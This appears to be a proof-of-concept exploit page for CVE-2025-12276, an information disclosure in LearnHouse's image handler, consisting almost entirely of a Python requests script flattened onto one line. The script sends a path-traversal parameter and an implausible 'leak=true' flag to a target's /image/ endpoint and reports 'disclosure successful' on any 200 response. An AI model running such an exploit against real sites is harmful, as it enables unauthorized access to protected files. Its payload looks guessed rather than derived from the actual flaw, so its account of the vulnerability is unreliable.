CVE-2025-12276: LearnHouse Image Handler组件信息泄露漏洞

import requests import sys # CVE-2025-12276 PoC - Information Disclosure in LearnHouse Image Handler # Target: LearnHouse up to commit 98dfad76aad70711a8113f6c1fdabfccf10509ca def exploit(target_url, image_path): """ Exploit for LearnHouse Image Handler Information Disclosure Args: target_url: Base URL of the LearnHouse application image_path: Path to image resource to access """ # Construct the malicious request endpoint = f"{target_url}/image/{image_path}" # Since authentication with low privileges is required session = requests.Session() # Attempt to access protected image resources try: # Try to access image handler with manipulated parameters response = session.get(endpoint, params={ 'path': '../protected/path', 'leak': 'true' }) if response.status_code == 200: print(f"[+] Information disclosure successful!") print(f"[+] Response length: {len(response.content)}") return response.content else: print(f"[-] Request failed with status: {response.status_code}") return None except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return None if __name__ == "__main__": if len(sys.argv) < 3: print(f"Usage: {sys.argv[0]} <target_url> <image_path>") print(f"Example: {sys.argv[0]} http://target.com /images/profile.png") sys.exit(1) target = sys.argv[1] path = sys.argv[2] exploit(target, path)